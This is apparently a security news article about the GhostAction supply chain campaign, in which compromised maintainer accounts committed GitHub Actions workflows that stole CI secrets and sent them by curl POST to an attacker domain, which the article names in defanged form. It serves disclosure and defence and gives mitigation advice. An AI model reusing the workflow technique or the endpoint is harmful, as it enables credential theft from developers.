Sign in Subscribe

GhostAction Attack Led to the Exposure of 3,325 Secrets

GhostAction Attack Led to the Exposure of 3,325 Secrets

Another significant supply chain attack, dubbed GhostAction, has been uncovered. This campaign targeted GitHub repositories and resulted in the theft of 3,325 secrets—including PyPI, npm, DockerHub, and GitHub tokens, as well as Cloudflare and AWS API keys.

How the Attack Was Discovered

The breach was first identified by researchers at GitGuardian, who observed suspicious activity in the open-source project FastUUID on September 2, 2025. Threat actors had compromised maintainer accounts and used them to commit a malicious GitHub Actions workflow file.

The injected workflow automatically triggered on pushes or manual runs. Once executed, it harvested secrets from the repository’s GitHub Actions environment and exfiltrated them to an attacker-controlled domain via a curl POST request.

In FastUUID’s case, the attackers also stole a PyPI token. However, no malicious package was released, and the intrusion was eventually detected and contained.

Expanding the Scope

Further investigation revealed that GhostAction was far more widespread than a single project. Researchers found evidence that attackers introduced malicious commits into at least 817 repositories, all of which funneled stolen secrets to the same endpoint:

bold-dhawan[.]45-139-104-115[.]plesk[.]page

The attackers appeared to enumerate secret names from legitimate workflows and then hardcode them into their own workflows to capture diverse credentials.

Scale of the Compromise

Once the scale of the campaign became clear, GitGuardian and other security teams initiated remediation:

  • 573 repositories had GitHub Issues created to alert maintainers.
  • 100 repositories reverted the malicious commits.
  • The remaining projects were either deleted or disabled.

In total, researchers estimate 3,325 secrets were stolen, including PyPI and npm tokens, DockerHub and GitHub credentials, Cloudflare API tokens, AWS keys, and database logins.

At least nine npm packages and 15 PyPI packages were directly affected. If maintainers do not revoke the compromised credentials, attackers could use them to release malicious or trojanized versions at any time.

GhostAction vs. s1ngularity

The GhostAction campaign bears surface-level similarities to the s1ngularity attack disclosed in late August, which also abused GitHub Actions. However, GitGuardian researchers emphasize that the two incidents are not connected.

Key Takeaway

GhostAction underscores the growing risks posed by compromised maintainer accounts and poisoned workflows in software supply chains. Developers and organizations relying on GitHub Actions should:

  • Regularly rotate API tokens and credentials.
  • Implement stricter controls on repository access.
  • Monitor workflows for unauthorized changes.

Read next